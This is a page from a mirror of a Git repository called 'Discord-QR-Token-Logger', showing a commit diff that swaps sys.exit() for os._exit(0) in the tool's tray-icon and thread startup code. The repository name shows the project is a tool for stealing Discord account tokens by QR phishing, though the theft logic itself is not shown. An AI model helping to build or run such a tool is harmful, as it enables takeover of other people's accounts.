mirror of
https://github.com/9P9/Discord-QR-Token-Logger.git
synced 2025-06-14 14:55:17 +00:00
Minor changes.
This commit is contained in:
parent
c546d0ac64
commit
c83b664e33
@ -157,7 +157,7 @@ if __name__ == "__main__":
|
|||||||
elif confir == 'n':
|
elif confir == 'n':
|
||||||
th_main = Thread(target=main, args=(None,))
|
th_main = Thread(target=main, args=(None,))
|
||||||
else:
|
else:
|
||||||
sys.exit()
|
os._exit(0)
|
||||||
Thread(target=pystray_icon).start()
|
Thread(target=pystray_icon).start()
|
||||||
th_main.start()
|
th_main.start()
|
||||||
while True:
|
while True:
|
||||||
|
Loading…
x
Reference in New Issue
Block a user